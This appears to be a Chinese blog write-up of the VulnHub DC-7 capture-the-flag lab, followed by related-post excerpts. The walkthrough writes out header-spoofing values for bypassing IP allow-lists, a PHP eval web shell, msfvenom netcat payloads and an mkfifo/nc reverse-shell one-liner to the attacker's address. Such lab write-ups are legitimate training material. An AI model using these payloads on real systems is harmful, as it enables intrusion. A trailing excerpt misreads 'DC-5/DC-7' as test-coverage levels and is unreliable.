靶机8 DC-7(过程超详细)

已于 2024-09-02 11:30:55 修改
阅读量2.8k 收藏 5
点赞数 2
分类专栏: # 靶机 文章标签: 网络 安全 网络协议
于 2022-09-26 14:04:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/127052474
版权

简介:DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。

1、下载靶场

靶机名称:DC-7(包含1个flag)

下载地址:

DC: 7 ~ VulnHub

2、安装靶场

以DC-1为例,将文件解压(一压缩包形式进行下载)。

打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)

导入成功,开启此虚拟机( 当页面出现 DC-7 login 时表示安装成功)。

3、获取靶机的flag

前提:

1、已知kali的IP地址(ifconfig)

—— kali IP地址:192.168.108.129/24

2、DC-7和kali在同一网段 | 已知DC-7所在的网段

—— DC-7 IP地址:192.168.108.139/24

3.1信息收集

获取DC-7的IP地址

命令:netdiscover -r 192.168.108.0/24

由图可知DC-7的IP地址是:192.168.108.139/24

端口扫描

命令:nmap -sV -p- 192.168.108.139

//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描

获取信息如下:

端口号

服务

版本

22

ssh

7.4p1

80

http

Apche 2.4.25

3.2    渗透测试

看到这里大致思路就是在获取了一定信息之后可以对ssh进行暴力破解

访问了web之后可以在左下角看到CMS应该就是 Drupal ,但还是识别一下CMS,并且扫描一下目录

CMS识别结果(python3 cmseek.py -u http://dc-7/ ):Drupal 8

目录扫描(dirsearch -u "http://dc-7"  ):

扫到的几个有价值的目录

1、搜索

http://dc-7/search/node

2、404

http://dc-7/forum/install/core/install.php

http://dc-7/wp-admin/core/install.php

3、CMS的升级

http://dc-7/core/install.php

4、一个登录框

http://dc-7/user/login

5、403

http://dc-7/core/

http://dc-7/modules/

http://dc-7/profiles/

http://dc-7/sites/

http://dc-7/sites/

这里根据提示加上每一个打开的页面左下角都有一个作者的标志

猜测会有源码之类的,直接去github看一看

还真的找到了,这里包含了源码文件,有一个配置文件(config.php),看不懂没关系直接翻译

打开之后直接就获得了可能的账号密码(dc7user、MdR3xOgB7#dW)

在登录页面尝试登录失败(这里本来还以为是本地才行,burp抓包修改了ip也不行)

突破登录IP地址限制:

原理:如果登录系统设置了IP地址白名单,我们可以通过下面的几个http头字段伪造IP地址,用burp抓包后将下面的某个http头字段加入数据包发送到服务器

Client-Ip: 127.0.0.1

X-Client-IP: 127.0.0.1

X-Real-IP: 127.0.0.1

True-Client-IP: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-Forwarded-Host: 127.0.0.1

之前不是还有一个ssh服务嘛,尝试ssh登录成功了(dc7user、MdR3xOgB7#dW)

看了一下系统版本比较高,但还是抱着试一试的心态尝试了一下脏牛,结果果然是不行

试一下sudo和suid提权吧

sudo -l #查看可以sudo使用的程序

find / -perm -4000 2>/dev/null #寻找有SUID权限(4000的文件,不显示其他的错误信息相当于过滤

结果,这里并没有看到sudo和suid提权的方式

常用的SUID提权命令(nmap、vim、find、bash、more、less、nano、cp 等)

突然想起来在尝试脏牛提权的时候下载完成之后显示了收到了一个邮件,并且给出了地址

查看邮件,看看有没有什么敏感信息泄露,打开后看到了root和两个文件的地址

cat /var/mail/dc7user

查看一下 backups.sh 文件

在这里看到 backups.sh 文件里面执行了drush命令,执行的文件是/home/dc7user/backups/website.sql

想着直接改文件路径,但是可惜只有可读和可执行的权限,并不能写文件,想要写入的话还需要获取到webshell,使用www-data的用户权限

解释:

drush是一个shell接口,用于从云服务器命令行管理Drupal。

需要在 drupal web目录执行(/var/www/[drupal_folder_name])

使用 drup 更改密码运行命令(drush user-password admin --password="new_pass")

drush user-password admin --password="admin"

这就很尴尬,前面尝试次数太多了导致的

使用以下命令创建新用户:

drush user-create root --password "root"

drush user-password root--password="root"

使用root用户登陆成功

在个人信息里面看到了上传图片的地方,做了一个图片马尝试蚁剑连接,结果失败了,burp抓包也没找到可以跨目录存储的地方

还是没有什么办法,重新去登录admin用户

后面查了一下因为dc7的CMS是Drupal8,已经移除了PHP Filter(php过滤器),后续作为一个模组存在,可以手动安装。在官网找到下载链接,下载之后给 DC-7 安装

回到admin的后台管理界面依次点击左上角的manager→extend→install new module,浏览选择刚才的压缩包。

install安装成功,点击next steps里的enable newly added modules(启用新添加的模块)激活php模块

滚轮下滑找到 php fliter 勾选之后选择安装,安装成功

在Content中添加一句话木马,依次点击:content(内容)→add content→basic page(为静态内容使用基本页面),测试添加<?php phpinfo(); ?>,命名为ceshi。选择format为php code。

挂一句话木马(<?php @eval($_POST['aaa']);?>)

使用蚁剑连接,反弹shell

结果这里发现蚁剑不能使用终端执行命令

这里只能使用php执行实现反弹shell,这里使用php-reverse-shell(自行更改ip和port)

php-reverse-shell(PHP反向外壳)

  • 参考URL:https://pentestmonkey.net/tools/web-shells/php-reverse-shell
  • 此工具专为在渗透测试期间您对运行 PHP 的网络服务器具有上传访问权限的情况而设计。将此脚本上传到 Web 根目录中的某个位置,然后通过在浏览器中访问相应的 URL 来运行它。该脚本将打开从网络服务器到您选择的主机和端口的出站 TCP 连接。绑定到这个 TCP 连接的将是一个 shell。
  • 这将是一个适当的交互式 shell,您可以在其中运行 telnet、ssh 和 su 等交互式程序。它与基于 Web 表单的 shell 不同,后者允许您发送单个命令,然后返回输出。

msfvenom 获取反弹一句话(插入反弹shell的执行语句)

  • msfvenom -l payloads 'cmd/unix/reverse' #我们使用msfvenom-l进行"cmd/uniⅸ/reverse"反弹shelli命令生成payload的内容查询

生成 nc 反弹一句话生成

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.108.129 lport=9999 R

生成 bash 反弹一句话生成

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.108.129 lport=9999 R

尝试:

mkfifo /tmp/eieioac; nc 192.168.108.129 9999 0</tmp/eieioac | /bin/sh >/tmp/eieioac 2>&1; rm /tmp/eieioac

耐心等待backups.sh这个定时任务执行(真的要等一会),因为本来一维一下就反弹的,所以很快换了三个payload,结果发现需要等待执行

点击下方名片,加入GG安全团队,期待师傅们的加入,一起学习一起成长。

DC-7靶机渗透测试全过程
2401_88083440的博客
02-15 1503
社工信息搜集、一些网站配备的命令行工具的了解、通过下载插件来满足自己的需求,这些思路对我来说都是蛮新的,也参考了很多师傅的wp(因为实在是不会--_--|),没有解决问题的头绪。我在打靶机的时候,可能并不会去注意Drush命令工具(虽然会让AI给我解释,但是并不会想到要去利用它),然后关于插件,一开始登录进去之后,我第一个想的就是找个插件漏洞,但发现没有插件。。。
DC7靶机-Walkthrough
ins1ght的博客
09-23 2601
目前为止,做过的vlunhub里面的靶机里,这个算是比较开脑洞的了。首先发现网站首页footer部分多出的一个@DC7USER,这与一个未经DIY的Drupal站点的footer展示内容不同,进而通过Google搜索发现了放在Github上的系统登录口令,才有了后续的一系列操作。回忆起之前在某CTF大赛中打酱油的经历,那个时候也有一道Web题目,也是通过放在Github上的一个项目为突破口。历史真是TM惊人的相似……
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 950
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
DC-7靶场
mlws1900的博客
03-27 1211
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
靶机DC-7
weixin_43940853的博客
12-09 361
kali : 192.168.230.233 靶机 : 192.168.230.235 扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来 打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功 先进入了一个目录,查看文件后发现都是乱码 把目标放在mbox上 关注到邮件的Subj...
vulnhub之DC7靶机
LainWith的博客
02-14 1535
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
DC7-靶机
Au
11-30 1733
下载地址 下面是作者的一些提示,和爆破无关,需要Google~~~ 配置的环境: kali:192.168.25.131 DC7-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.128,判定为DC7-靶机,继续使用nmap获取详细信息...
Vulnhub靶机:DC-9渗透详细过程DC系列完结)
IerkeU的博客
03-28 3931
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
DC-1靶机过程(超详细!)
qq_68868384的博客
08-09 225
我们可以在/var/www/sites/default下面找到网站模版的配置文件,配置文件中有flag2和一个mysql数据库的用户和密码,但我们已经不需要了,因为我们已经通过SQL注入的那个脚本进入过了数据库。下载完之后我们通过命令来看一下脚本的用法,这里必须得用python2去运行,其他的都会报错,不知道是不是因为python版本不兼容的原因,运行之后下面就显示了脚本的用法和一些选项参数。根据扫描出来的ip,去查找目标网站,把有80端口开放的ip都去访问一下,看哪一个是我们要找的主机。
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2303
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1540
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1604
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
DC-7靶机
m0_62094846的博客
07-05 282
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.136 -p- -oN nmap136.Anmap -A -T4 192.168.61.136 -p- -oN nmap136.A有22和80端口下面有提示DC7USER百度一下可以下载一个文件这里也说明是重要点下载到kali本地git clone https://github.com/Dc7User/staffdbcd s
入侵靶机DC-7
干铮的博客
10-08 1512
DC-7 1.主机发现 靶机开机后DHCP获取有ip地址 2.信息收集 端口扫描 C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±?? Nmap scan report for dc-7 (192.168.43.111) Host is up (0.00030s latency). Not s
靶机渗透之DC-7
2301_76227305的博客
06-26 596
不算太难的靶机,就是一开始可以搜出来源码可能很难想到。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
渗透测试学习之靶机DC-7
xdbzdgx的博客
12-05 2699
1.下载靶机 本篇文章是DC靶机系列的第7篇,针对的是靶机DC-7,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-7的下载地址为DC: 7 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 DC-7只有一个flag。 在VMware加载成功之后并开启,建议把DC-7靶机网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88
DC-7靶场实战
qq_42754807的博客
03-25 1435
DC-7靶场实战
DC7靶机
qq_40646572的博客
05-11 227
信息搜集 开启DC7靶机 先看下DC7靶机下载页面是否有提示。 靶机作者提示,暴力破解,不可能,除非字典🐂。 先使用nmap扫描一下,看下靶机开放的端口。 Nmap扫描发现80端口以及22端口处于开启状态。 发现是drupal8cms系统。 发现没什么可以利用的信息。发现版权声明处存在一处不太对劲的信息,正常来讲此处应该是@drupal才对。 百度下,发现好多dc7靶机挑战者,用到了这个信息。此处信息是用于git信息搜集。 Github上直接搜集DC7USER。搜索到dc7靶机作者的账号,发现
DC-7靶机渗透
m0_62008601的博客
06-02 1118
dc-7靶机的渗透过程
黑盒测试DC-5和DC-7的总结与感悟
最新发布
03-21
### 黑盒测试中的DC-5和DC-7概述 黑盒测试是一种专注于软件功能性的测试方法,它不涉及内部实现细节。在黑盒测试领域,决策表(Decision Table, DT)是一种常用的测试用例设计技术,用于分析复杂的逻辑条件及其对应的操作[^4]。 #### DC-5 (Decision Coverage Level 5) DC-5 是指 **决策覆盖率级别 5**,通常表示对布尔表达式的每种可能取值都进行了至少一次的测试。这意味着对于每一个 `if` 或者类似的控制语句,其真值和假值都被验证了一次。这种级别的覆盖确保了程序中每个分支至少被执行一次。 #### DC-7 (Decision Coverage Level 7) DC-7 则进一步扩展了测试范围,不仅涵盖了所有单个条件的结果,还考虑到了不同条件之间的组合情况。这相当于更高层次的路径覆盖,即不仅要测试单一条件下的行为,还要测试多条件联合时的行为模式。这种方法更接近于完全路径覆盖,但仍然避免了一些极端冗余的情况。 ### 区别与联系 两者的根本差异在于所达到的覆盖程度: - **DC-5** 主要是针对简单分支的覆盖; - 而 **DC-7** 更加深入,涉及到多个条件交互作用后的全面覆盖。 因此可以说,DC-7 是一种更为严格且详尽的测试策略,它可以发现更多潜在缺陷,但也相应增加了测试成本和复杂度。 ### 总结和个人体会 通过对比两种不同的决策覆盖等级可以看出,在实际项目应用过程中需权衡资源投入与收益关系。如果追求极致的质量保障,则应选用较高水平如DC-7这样的方案;但如果时间和预算有限制的话,则可以选择相对基础一点的方式比如DC-5来进行初步筛查工作。 另外值得注意的是,无论采取何种具体措施,保持良好的文档记录习惯以及团队间有效沟通都是非常重要的环节之一。只有这样才能够真正意义上提高整体工作效率并减少后期维护困难等问题的发生几率[^3]。 ```python def test_condition(a, b): if a > 0 and b < 10: # 这里体现了DC-7的概念,因为存在两个条件a>0,b<10的不同组合情形需要被考虑到 return True else: return False ``` 上述代码片段展示了当有两个独立输入参数a和b时,为了满足DC-7的要求,我们需要分别尝试四种可能性:(a正数&b小于十)(a负数&b小于十)(a正数&b大于等于十)还有最后一种就是两者都不符合条件的状态下函数返回值是否正确无误地反映了预期结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值